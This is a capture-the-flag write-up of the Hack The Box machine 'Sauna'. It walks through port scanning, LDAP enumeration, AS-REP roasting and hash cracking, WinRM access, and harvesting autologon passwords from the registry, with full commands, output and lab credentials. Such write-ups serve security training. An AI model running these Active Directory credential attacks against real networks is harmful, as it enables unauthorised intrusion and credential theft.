Sauna

Completed on February 15, 2020.

Overview

Back when I did this box 2 years ago, I used commands like type to look at the content of files, or normal command-line commands within powershell, as well as Metasploit. As I am redoing some sections for documentation purposes, I will use a different approach, such as using powershell commands, and avoid relying on methods that might not be helpful when going through exams like the OSCP.

Let's face it, writing documentation from something you wrote and worked on two years ago can be a headache.

Sauna can be a good HTB box to practice your enumeration process, both remote and local, as you can find what you need to do by carefully assessing the services and the system itself. It never hurts anyone to be thorough when enumerating.

References:

• MITRE: Use Alternate Authentication Material: Pass the Hash

• Pass-The-Hash Attack Explained

• HackTricks Windows Local Privilege Escalation

• HackTricks Active Directory Methodology

Enumeration

Finding Open Ports

To gather information about this machine, we start by finding any TCP/UDP open ports using masscan.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.175 --rate=1000 | tee Sauna-masscan.log
 
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-15 19:57:41 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 53/udp on 10.10.10.175                                    
Discovered open port 636/tcp on 10.10.10.175                                   
Discovered open port 135/tcp on 10.10.10.175                                   
Discovered open port 389/tcp on 10.10.10.175                                   
Discovered open port 49667/tcp on 10.10.10.175                                 
Discovered open port 139/tcp on 10.10.10.175                                   
Discovered open port 445/tcp on 10.10.10.175                                   
Discovered open port 88/tcp on 10.10.10.175                                    
Discovered open port 49669/tcp on 10.10.10.175                                 
Discovered open port 9389/tcp on 10.10.10.175                                  
Discovered open port 464/tcp on 10.10.10.175                                   
Discovered open port 3269/tcp on 10.10.10.175                                  
Discovered open port 49671/tcp on 10.10.10.175                                 
Discovered open port 52250/tcp on 10.10.10.175                                 
Discovered open port 80/tcp on 10.10.10.175                                    
Discovered open port 5985/tcp on 10.10.10.175                                  
Discovered open port 3268/tcp on 10.10.10.175                                  
Discovered open port 593/tcp on 10.10.10.175                                   
Discovered open port 49682/tcp on 10.10.10.175                                 
Discovered open port 53/tcp on 10.10.10.175                                    
Discovered open port 49670/tcp on 10.10.10.175

Port Scanning

To further get more information about these open ports we found, we used nmap SYN scan (-sS) with default script execution (-sC) and service version enumeration (-sV).

Before we do this, we gathered in a variable (PORTS) a list of the TCP ports found open to then use it for our scan. This step is not necessary but helpful.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ PORTS=$(cat Sauna-masscan.log | grep tcp | cut -d ' ' -f 4 | cut -d '/' -f 1 | xargs | tr ' ' ',')
                                                                                                                                                                         
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 -T4 sauna.htb
[sudo] password for jxberrios: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 01:19 EDT
Nmap scan report for sauna.htb (10.10.10.175)
Host is up (0.040s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-14 12:18:06Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49669/tcp filtered unknown
49670/tcp filtered unknown
49671/tcp filtered unknown
49682/tcp filtered unknown
52250/tcp filtered unknown
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-04-14T12:18:59
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: 6h58m39s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.50 seconds

From the service found, whenever LDAP(s) or SMB are accessible, I try to target these service first instead of going for others like HTTP. These services are known to be misconfigured frequently and allow access with no authentication.

Enumerating LDAP

While enumerating LDAP, we try to define the scope and reduce the data returned while providing necessary information. Here, we pulled the naming context information as well as the DNs available.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ ldapsearch -x -H ldap://sauna.htb:389 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Pulling all the distinguished names in the directory.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ ldapsearch -x -H ldap://sauna.htb:389 -b "dc=egotistical-bank,dc=local" -s one
extended LDIF

LDAPv3
base <dc=egotistical-bank,dc=local> with scope oneLevel
filter: (objectclass=*)
requesting: ALL

Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
search reference
ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTIST ICAL-BANK,DC=LOCAL??base
search reference
ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTIST ICAL-BANK,DC=LOCAL??base
search reference
ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOC AL??base
search result
search: 2 result: 0 Success
numResponses: 18
numEntries: 14
numReferences: 3

Using Impacket's GetNPUsers

Now that we found the 'CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL' distinguished name, we have to try using it.

We don't have a definitive samAccountName to go by, but from all the possible username combinations we could come up with, hsmith seemed to give a different response when trying to check for Kerberos Pre-Authentication with GetNPUsers.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-GetNPUsers -no-pass -dc-ip sauna.htb EGOTISTICALBANK/hsmith
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
 
[*] Getting TGT for hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

Given this information, we should go to the web service available:

Egotistical Bank Homepage

Egotistical Bank 'About Us' page

The /about.html page shows the company employees, which could be Active Directory users as well. At the same time, oddly enough, it shows two users, 'Hugo Bear' and 'Fergus Smith', but no 'Hugo Smith'.

Given this information, we should attempt to use hbear and fsmith.

Exploitation and Gaining Access

Using Impacket's GetNPUsers

Knowing that the samAccountName valid for Hugo Smith is hsmith, we tried hbear with no success as it seems to not exist, so let's try fsmith and see if we get a Kerberos TGT by doing ASREPRoast attack.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-GetNPUsers -no-pass -dc-ip sauna.htb EGOTISTICALBANK/fsmith
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
 
[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICALBANK:aea8ef4648721a533bc255aca82e8a7a$cf3a300504779d50b7785d153a0d59614e67faa7b4e53fac359a745a0be65a0436a3a3e0d876c1fbb8659571ba264211e8b8b9cd6b52c16f2f49022a7a9c96af0dafefd7dfacbc2060aaa5c947ed579d7c18a4488741d709dfe3d20ba936a913795c02104375c382f1fd24dc3da7ef3fe37e21a98735a10641c33f0fc7fadaa6adce01f7cea9b1bc60190e2c5fce5a4e5fe11ff03bdd07117920058b366f51fbfe913ff73ae6b26433bc2046aa6061fcc44d06d8610300588fe65a7711794d599d96f274ede014c48d82fc140818760a7102b67c5b756f67601b165fbe33e712f56f6f65d2be8fe3a8c28f63bfe531f0dfede32fb15dcee900

AND we found a valid Kerberos Ticket. Let's try and crack it with John The Ripper.

Using John The Ripper

This step is self-explanatory. We are relying on a password/hash cracking tool to get fsmith's password by cracking the Kerberos Ticket from our previous Kerberoasting step.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sauna_krb.txt > saunaCreds.txt
Using default input encoding: UTF-8
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:12 DONE (2020-02-16 13:03) 0.07923g/s 835103p/s 835103c/s 835103C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
jxberrios@back0ff:~/Documents/HTB-Labs/Sauna$ cat saunaCreds.txt 
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICALBANK)

Using Enum4Linux

With these credentials, let's keep enumerating with enum4linux, and try to gather user and group membership, operating system and share information.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ enum4linux -U -G -S -r -o -u fsmith -p Thestrokes23 -w EGOTISTICALBANK sauna.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 16 13:05:49 2020

 =========================================( Target Information )=========================================

Target ........... sauna.htb
RID Range ........ 500-550,1000-1050
Username ......... 'fsmith'
Password ......... 'Thestrokes23'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =============================( Enumerating Workgroup/Domain on sauna.htb )=============================


[+] Got domain/workgroup name: EGOTISTICALBANK


 =====================================( Session Check on sauna.htb )=====================================


[+] Server sauna.htb allows sessions using username 'fsmith', password 'Thestrokes23'


 ==================================( Getting domain SID for sauna.htb )==================================

Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766

[+] Host is part of a domain (not a workgroup)


 ====================================( OS information on sauna.htb )====================================


[E] Can't get OS info with smbclient


[+] Got OS info for sauna.htb from srvinfo: 
	SAUNA.HTB      Wk Sv PDC Tim PrQ NT SAUNA
	platform_id     :	500
	os version      :	10.0
	server type     :	0x80122b


 =========================================( Users on sauna.htb )=========================================

index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0xfaf RID: 0x451 acb: 0x00010210 Account: FSmith	Name: Fergus Smith	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xfad RID: 0x44f acb: 0x00000210 Account: HSmith	Name: Hugo Smith	Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0xfb6 RID: 0x454 acb: 0x00000210 Account: svc_loanmgr	Name: L Manager	Desc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[HSmith] rid:[0x44f]
user:[FSmith] rid:[0x451]
user:[svc_loanmgr] rid:[0x454]

 ===================================( Share Enumeration on sauna.htb )===================================

do_connect: Connection to sauna.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	RICOH Aficio SP 8300DN PCL 6 Printer   We cant print money
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on sauna.htb

//sauna.htb/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
//sauna.htb/C$	Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_INVALID_INFO_CLASS listing \*
//sauna.htb/IPC$	Mapping: N/A Listing: N/A Writing: N/A
//sauna.htb/NETLOGON	Mapping: OK Listing: OK Writing: N/A
//sauna.htb/print$	Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//sauna.htb/RICOH Aficio SP 8300DN PCL 6	Mapping: N/A Listing: N/A Writing: N/A
//sauna.htb/SYSVOL	Mapping: OK Listing: OK Writing: N/A

 ========================================( Groups on sauna.htb )========================================


[+] Getting builtin groups:

group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]

[+]  Getting builtin group memberships:

Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\FSmith
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\svc_loanmgr
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: EGOTISTICALBANK\Domain Users
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Administrator
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Enterprise Admins
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Domain Admins
Group: Guests' (RID: 546) has member: EGOTISTICALBANK\Guest
Group: Guests' (RID: 546) has member: EGOTISTICALBANK\Domain Guests
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS

[+]  Getting local groups:

group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting local group memberships:

Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Read-only Domain Controllers

[+]  Getting domain groups:

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]

[+]  Getting domain group memberships:

Group: 'Schema Admins' (RID: 518) has member: EGOTISTICALBANK\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\krbtgt
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\HSmith
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\FSmith
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\svc_loanmgr
Group: 'Group Policy Creator Owners' (RID: 520) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Guests' (RID: 514) has member: EGOTISTICALBANK\Guest
Group: 'Domain Admins' (RID: 512) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Controllers' (RID: 516) has member: EGOTISTICALBANK\SAUNA$

 ====================( Users on sauna.htb via RID cycling (RIDS: 500-550,1000-1050) )====================


[I] Found new SID: 
S-1-5-21-2966785786-3096785034-1186376766

[I] Found new SID: 
S-1-5-21-2966785786-3096785034-1186376766

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-5-21-2957739120-1979133213-3197504660 and logon username 'fsmith', password 'Thestrokes23'

S-1-5-21-2957739120-1979133213-3197504660-500 SAUNA\Administrator (Local User)
S-1-5-21-2957739120-1979133213-3197504660-501 SAUNA\Guest (Local User)
S-1-5-21-2957739120-1979133213-3197504660-503 SAUNA\DefaultAccount (Local User)
S-1-5-21-2957739120-1979133213-3197504660-504 SAUNA\WDAGUtilityAccount (Local User)
S-1-5-21-2957739120-1979133213-3197504660-513 SAUNA\None (Domain Group)

[+] Enumerating users using SID S-1-5-90 and logon username 'fsmith', password 'Thestrokes23'


[+] Enumerating users using SID S-1-5-80 and logon username 'fsmith', password 'Thestrokes23'


[+] Enumerating users using SID S-1-5-21-2966785786-3096785034-1186376766 and logon username 'fsmith', password 'Thestrokes23'

S-1-5-21-2966785786-3096785034-1186376766-500 EGOTISTICALBANK\Administrator (Local User)
S-1-5-21-2966785786-3096785034-1186376766-501 EGOTISTICALBANK\Guest (Local User)
S-1-5-21-2966785786-3096785034-1186376766-502 EGOTISTICALBANK\krbtgt (Local User)
S-1-5-21-2966785786-3096785034-1186376766-512 EGOTISTICALBANK\Domain Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-513 EGOTISTICALBANK\Domain Users (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-514 EGOTISTICALBANK\Domain Guests (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-515 EGOTISTICALBANK\Domain Computers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-516 EGOTISTICALBANK\Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-517 EGOTISTICALBANK\Cert Publishers (Local Group)
S-1-5-21-2966785786-3096785034-1186376766-518 EGOTISTICALBANK\Schema Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-519 EGOTISTICALBANK\Enterprise Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-520 EGOTISTICALBANK\Group Policy Creator Owners (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-521 EGOTISTICALBANK\Read-only Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-522 EGOTISTICALBANK\Cloneable Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-525 EGOTISTICALBANK\Protected Users (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-526 EGOTISTICALBANK\Key Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-527 EGOTISTICALBANK\Enterprise Key Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-1000 EGOTISTICALBANK\SAUNA$ (Local User)

[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'fsmith', password 'Thestrokes23'


[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'fsmith', password 'Thestrokes23'


[+] Enumerating users using SID S-1-5-32 and logon username 'fsmith', password 'Thestrokes23'

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

enum4linux complete on Feb 16 13:16:49 2020

At this point, we have a list of users (local and domain), groups, shares, and other useful information. While at it, if we pay close attention, we notice fsmith cannot be used to access the system using SMB.

Also, we noticed the both fsmith and svc_loanmgr are members of the Remote Management Users group, which means both have access to WinRM.

Sample output:

Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\FSmith
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\svc_loanmgr

Given that gaining access through SMB is out of the question, we should attempt through WinRM.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ evil-winrm -i sauna.htb -u fsmith -p 'Thestrokes23'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..\Desktop\
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/13/2022   1:39 PM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> Get-Content -path .\user.txt
288180********************9f1e40

And we got the user flag!

Privilege Escalation

Now that we are in the system, let's look at any paths to escalate privileges. Given that we have some domain accounts as well as local, we will need to do some more local enumeration.

Let's first use SharpHound and retrieve the data for further review:

*Evil-WinRM* PS C:\Users\FSmith\Downloads> upload /opt/BloodHound/Ingestors/SharpHound.exe
Info: Uploading /opt/BloodHound/Ingestors/SharpHound.exe to C:\Users\FSmith\Downloads\SharpHound.exe

                                                             
Data: 1111380 bytes of 1111380 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\FSmith\Downloads> .\SharpHound.exe --domain EGOTISTICALBANK --ldapusername fsmith --ldappassword Thestrokes23 --collectionmethod All --collectallproperties --zipfilename ADExtract.zip
-----------------------------------------------
Initializing SharpHound at 3:22 AM on 4/14/2022
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 60 objects finished (+60 ì)/s -- Using 27 MB RAM
Enumeration finished in 00:00:00.3175357
Compressing data to .\20220414032226_ADExtract.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:22 AM on 4/14/2022! Happy Graphing!

Continuing with some manual enumeration:

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

From these accounts, we know already fsmith, so we only have hsmith and svc_loanmgr left to look at.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user hsmith
User name                    HSmith
Full Name                    Hugo Smith
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/22/2020 10:54:34 PM
Password expires             Never
Password changeable          1/23/2020 10:54:34 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user svc_loanmgr
User name                    svc_loanmgr
Full Name                    L Manager
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/24/2020 4:48:31 PM
Password expires             Never
Password changeable          1/25/2020 4:48:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

Between these two accounts, we can tell already from our remote enumeration that svc_loanmgr is a member of the Remote Management Users group but both can authenticate against the domain.

Let's try to find out if any cached credentials exist by looking at the Winlogon registry key:

*Evil-WinRM* PS C:\Users\FSmith\Desktop> cd "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\WinLogon"
*Evil-WinRM* PS HKLM:\Software\Microsoft\Windows NT\CurrentVersion\WinLogon> Get-Item -Path . 


    Hive: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion


Name                           Property
----                           --------
WinLogon                       AutoRestartShell             : 1
                               Background                   : 0 0 0
                               CachedLogonsCount            : 10
                               DebugServerCommand           : no
                               DefaultDomainName            : EGOTISTICALBANK
                               DefaultUserName              : EGOTISTICALBANK\svc_loanmanager
                               DisableBackButton            : 1
                               EnableSIHostIntegration      : 1
                               ForceUnlockLogon             : 0
                               LegalNoticeCaption           :
                               LegalNoticeText              :
                               PasswordExpiryWarning        : 5
                               PowerdownAfterShutdown       : 0
                               PreCreateKnownFolders        : {A520A1A4-1780-4FF6-BD18-167343C5AF16}
                               ReportBootOk                 : 1
                               Shell                        : explorer.exe
                               ShellCritical                : 0
                               ShellInfrastructure          : sihost.exe
                               SiHostCritical               : 0
                               SiHostReadyTimeOut           : 0
                               SiHostRestartCountLimit      : 0
                               SiHostRestartTimeGap         : 0
                               Userinit                     : C:\Windows\system32\userinit.exe,
                               VMApplet                     : SystemPropertiesPerformance.exe /pagefile
                               WinStationsDisabled          : 0
                               scremoveoption               : 0
                               DisableCAD                   : 1
                               LastLogOffEndTimePerfCounter : 2358450679
                               ShutdownFlags                : 2147484203
                               DisableLockWorkstation       : 0
                               DefaultPassword              : Moneymakestheworldgoround!

And we immediately notice credentials in the registry when looking for cache credential counts.

We can attempt to use them to authenticate through WinRM but we need to use svc_loanmgr instead of svc_loanmanager used in the registry key value DefaultUserName as it does not exist, check the accounts privileges.

┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ evil-winrm -i sauna.htb -u svc_loanmgr -p 'Moneymakestheworldgoround!'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

